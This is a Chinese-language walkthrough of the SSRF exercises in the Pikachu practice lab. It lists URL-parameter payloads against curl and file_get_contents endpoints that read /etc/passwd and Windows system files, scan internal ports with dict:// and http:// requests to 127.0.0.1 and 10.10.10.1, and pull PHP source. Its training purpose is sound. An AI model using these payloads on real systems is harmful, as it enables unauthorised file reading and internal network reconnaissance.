pikachu_ssrf攻略
ssrf(curl):
打开pikachu靶场:
发现URL地址最后面是info1.php 猜测一下有没有可能存在info2.php?
尝试修改访问地址:?
因为curl支持很多协议(http,file想,dict等),尝试访问一下:
文件访问(http)
比如说修改url为:?url=http://www.baidu.com,访问百度页面?url=http://www.baidu.com/robots.txt,访问百度文件等
?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt
端口扫描(http,dict)
使用dict协议可以获取内网主机开放端口相应服务的指纹信息,比如说主机开了http端口
?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306
?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379
读取本地文件(file)
修改url为:?url=file:///etc/passwd,查看文件的内容:
?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd
?url=file:/c:/www/ssrf/ssrf_curl.php
ssrf(file_get_content)
首先了解什么是file_get_content的使用:
file_get_contents() 把整个文件读入一个字符串中。
语法:file_get_contents(path,include_path,context,start,max_length)
进行协议测试:
文件读取
读取本地信息?file=file:///c:/1.txt
http协议请求内网资源?
?file=http://127.0.0.1/ssrf/ssrf_curl.php读取文件内容
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!